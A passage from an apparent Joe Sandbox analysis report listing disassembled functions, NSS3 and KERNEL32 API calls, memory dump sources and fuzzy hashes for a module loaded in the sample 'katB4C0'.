                                                                          • Part of subcall function 6CBD9090: LeaveCriticalSection.KERNEL32 ref: 6CBD913F
                                                                          • Part of subcall function 6CB1E190: PR_EnterMonitor.NSS3(?,?,6CB1E175), ref: 6CB1E19C
                                                                          • Part of subcall function 6CB1E190: PR_EnterMonitor.NSS3(6CB1E175), ref: 6CB1E1AA
                                                                          • Part of subcall function 6CB1E190: PR_ExitMonitor.NSS3 ref: 6CB1E208
                                                                          • Part of subcall function 6CB1E190: PL_HashTableRemove.NSS3(?), ref: 6CB1E219
                                                                          • Part of subcall function 6CB1E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB1E231
                                                                          • Part of subcall function 6CB1E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB1E249
                                                                          • Part of subcall function 6CB1E190: PR_ExitMonitor.NSS3 ref: 6CB1E257
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB21E37
                                                                        • PR_ExitMonitor.NSS3 ref: 6CB21E4A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
                                                                        • String ID:
                                                                        • API String ID: 499896158-0
                                                                        • Opcode ID: 46b35b51077a79e367e8bf8e10da41bc75003f37ac3458aefc8410362b8e90e8
                                                                        • Instruction ID: e229e73dfa5505a269c545e2e09ade48333041aee50ee01ea04d5607dcaf678d
                                                                        • Opcode Fuzzy Hash: 46b35b51077a79e367e8bf8e10da41bc75003f37ac3458aefc8410362b8e90e8
                                                                        • Instruction Fuzzy Hash: 0D01D471B001E0A7EB00AA25EC00F6A7774EB41748F180030E41C97B91E737EC14CB92
                                                                        Function 6CBBAC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PK11_FreeSymKey.NSS3(?,6CBA5D40,00000000,?,?,6CB96AC6,6CBA639C), ref: 6CBBAC2D
                                                                          • Part of subcall function 6CB5ADC0: TlsGetValue.KERNEL32(?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AE10
                                                                          • Part of subcall function 6CB5ADC0: EnterCriticalSection.KERNEL32(?,?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AE24
                                                                          • Part of subcall function 6CB5ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CB3D079,00000000,00000001), ref: 6CB5AE5A
                                                                          • Part of subcall function 6CB5ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AE6F
                                                                          • Part of subcall function 6CB5ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AE7F
                                                                          • Part of subcall function 6CB5ADC0: TlsGetValue.KERNEL32(?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AEB1
                                                                          • Part of subcall function 6CB5ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CB3CDBB,?,6CB3D079,00000000,00000001), ref: 6CB5AEC9
                                                                        • PK11_FreeSymKey.NSS3(?,6CBA5D40,00000000,?,?,6CB96AC6,6CBA639C), ref: 6CBBAC44
                                                                        • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CBA5D40,00000000,?,?,6CB96AC6,6CBA639C), ref: 6CBBAC59
                                                                        • free.MOZGLUE(8CB6FF01,6CB96AC6,6CBA639C,?,?,?,?,?,?,?,?,?,6CBA5D40,00000000,?,6CBAAAD4), ref: 6CBBAC62
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                        • String ID:
                                                                        • API String ID: 1595327144-0
                                                                        • Opcode ID: fa333be0ec427c3a97f9ce3e4c3e47b665e781a6af94464dc1ef8979efb58423
                                                                        • Instruction ID: 053ec59e62a8255d1fe72c26e7edf433470456523ce4c2db5685fb5e1dda9992
                                                                        • Opcode Fuzzy Hash: fa333be0ec427c3a97f9ce3e4c3e47b665e781a6af94464dc1ef8979efb58423
                                                                        • Instruction Fuzzy Hash: 72012CB5A002509BDB00DF15EDD0B6677A8EB44B58F188068E9499F746D731F844CFA2
                                                                        Function 6CB6FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CB19003,?), ref: 6CB6FD91
                                                                          • Part of subcall function 6CB70BE0: malloc.MOZGLUE(6CB68D2D,?,00000000,?), ref: 6CB70BF8
                                                                          • Part of subcall function 6CB70BE0: TlsGetValue.KERNEL32(6CB68D2D,?,00000000,?), ref: 6CB70C15
                                                                        • PORT_Alloc_Util.NSS3(A4686CB7,?), ref: 6CB6FDA2
                                                                        • memcpy.VCRUNTIME140(00000000,12D068C3,A4686CB7,?,?), ref: 6CB6FDC4
                                                                        • free.MOZGLUE(00000000,?,?), ref: 6CB6FDD1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Alloc_Util$Valuefreemallocmemcpy
                                                                        • String ID:
                                                                        • API String ID: 2335489644-0
                                                                        • Opcode ID: 75528e831511e45e500a5380ccd7dacf7b85b7cde7567acdf0ddaa1fdafe99a8
                                                                        • Instruction ID: 369757df1013d7643817d578fec90eb069f0787916367159707c160f0d8d4d15
                                                                        • Opcode Fuzzy Hash: 75528e831511e45e500a5380ccd7dacf7b85b7cde7567acdf0ddaa1fdafe99a8
                                                                        • Instruction Fuzzy Hash: BCF0FCF16022925BEF004F56EC80A277768EF54299B148035ED19CBF02E721E814C7F2
                                                                        Function 6CC2CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalDeleteSectionfree
                                                                        • String ID:
                                                                        • API String ID: 2988086103-0
                                                                        • Opcode ID: 253c9c9b0a3914f79c98b75b30af5ba0b97adc4ad687b0cf49c89162751ad6d4
                                                                        • Instruction ID: 405af0a4fe22d84a628a46d4d4f22932f45b0258682f81444f6367952725faad
                                                                        • Opcode Fuzzy Hash: 253c9c9b0a3914f79c98b75b30af5ba0b97adc4ad687b0cf49c89162751ad6d4
                                                                        • Instruction Fuzzy Hash: 35E065767016089FCE10EFAADC84C9777BCEE892703150525E691C3700D231F905CBE1
                                                                        Function 6CB09DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • sqlite3_value_text.NSS3 ref: 6CB09E1F
                                                                          • Part of subcall function 6CAC13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6CA92352,?,00000000,?,?), ref: 6CAC1413
                                                                          • Part of subcall function 6CAC13C0: memcpy.VCRUNTIME140(00000000,6CA92352,00000002,?,?,?,?,6CA92352,?,00000000,?,?), ref: 6CAC14C0
                                                                        Strings
                                                                        • LIKE or GLOB pattern too complex, xrefs: 6CB0A006
                                                                        • ESCAPE expression must be a single character, xrefs: 6CB09F78
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: memcpysqlite3_value_textstrlen
                                                                        • String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
                                                                        • API String ID: 2453365862-264706735
                                                                        • Opcode ID: 0f3fe07bd2da3f7712869f20b21bef450fbecc2e51c9907f606bc4e8cb91e33b
                                                                        • Instruction ID: b1610d861f2c6c85d443ebe82d3d6252e2914f9e02c834e69812804c44b83dfc
                                                                        • Opcode Fuzzy Hash: 0f3fe07bd2da3f7712869f20b21bef450fbecc2e51c9907f606bc4e8cb91e33b
                                                                        • Instruction Fuzzy Hash: 1481EB71F042954BDB00CF25C4903AABFF2EF45318F288659D8A98BB91D735EC86C791
                                                                        Function 6CB64D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB64D57
                                                                        • PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6CB64DE6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorR_snprintf
                                                                        • String ID: %d.%d
                                                                        • API String ID: 2298970422-3954714993
                                                                        • Opcode ID: 964f80c37da94a582556654449ffa062a3a63a8b9dc3e049a208d8ec3316a1cf
                                                                        • Instruction ID: f690c50c6d935e3bb4af5456a594b8b36aaf0d4f296badf4ebbc52fb3cedc31f
                                                                        • Opcode Fuzzy Hash: 964f80c37da94a582556654449ffa062a3a63a8b9dc3e049a208d8ec3316a1cf
                                                                        • Instruction Fuzzy Hash: C931ECB2D002686BEB10DBA6DC11BFF7768DF41308F050429ED155BB51EB309D05CBA2
                                                                        Function 6CB70DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Value$calloc
                                                                        • String ID:
                                                                        • API String ID: 3339632435-0
                                                                        • Opcode ID: 2bbfd8087598065c34b509741d409aba6bc78242c9e377c1618d11f7bba7a048
                                                                        • Instruction ID: 7be4e47142858294fdeb8b42084e2a6b849800695d6b45ccb7893330e4b872ae
                                                                        • Opcode Fuzzy Hash: 2bbfd8087598065c34b509741d409aba6bc78242c9e377c1618d11f7bba7a048
                                                                        • Instruction Fuzzy Hash: B93193B0E553D4CFDB20AF39E5446697BB4FF46308F11466ADCA8C7A11DB368085CBA2